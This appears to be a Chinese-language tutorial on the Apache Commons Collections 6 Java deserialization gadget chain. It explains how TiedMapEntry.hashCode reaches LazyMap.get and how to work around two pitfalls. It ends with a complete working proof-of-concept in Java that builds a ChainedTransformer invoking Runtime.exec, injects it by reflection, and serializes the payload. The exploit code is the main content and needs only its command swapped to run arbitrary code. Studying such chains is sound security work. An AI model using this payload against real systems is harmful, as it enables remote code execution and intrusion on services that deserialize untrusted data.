Apache Commons Collections 6

[!Tip]

这条链是利用的Map中的链,所以不限制jdk版

利用链分析

与CC1的入口一致,都是LazyMap.get(),CC6是由 TiedMapEntry类中的getValue方法,其中的map、key都是可以控制的

image-20230221105532474

而在 TiedMapEntry类中,可以找到 hashCode 中调用了 getValue ,而我们知道URLDNS这条链也是利用的hashCode ,所以就可以成功利用这条链

image-20230221110043135

注:这里存在两个问题

  1. 在这条链中要想map中添加元素也会触发hash

image-20230221110644953

为了避免这个问题,可以将Transformer 随意取值,不让后续链触发。

Map lazy = LazyMap.decorate(new HashMap<>(), new ConstantTransformer(1));
  1. 序列化之后,会在map中生存一个key,导致后续无法进入这个if语句中

image-20230221111046190

所以在成功put之后,要删除添加的key

map.put(tiedMap,"aaa");
lazy.remove("cccc");

完整POC

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC6 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}),
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map lazy = LazyMap.decorate(new HashMap<>(), new ConstantTransformer(1));
        TiedMapEntry tiedMap = new TiedMapEntry(lazy,"cccc");
        HashMap<Object, Object> map = new HashMap<>();
        map.put(tiedMap,"aaa");
        lazy.remove("cccc");
        Class<? extends Map> aClass = lazy.getClass();
        Field factory = aClass.getDeclaredField("factory");
        factory.setAccessible(true);
        factory.set(lazy,chainedTransformer);
        serialize(map);
        unserialize("ser.bin");
    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(Files.newInputStream(Paths.get(Filename)));
        return objectInputStream.readObject();
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(Files.newOutputStream(Paths.get("ser.bin")));
        objectOutputStream.writeObject(obj);
    }

}

CC6利用流程图

image-20230310112404524

results matching ""

    No results matching ""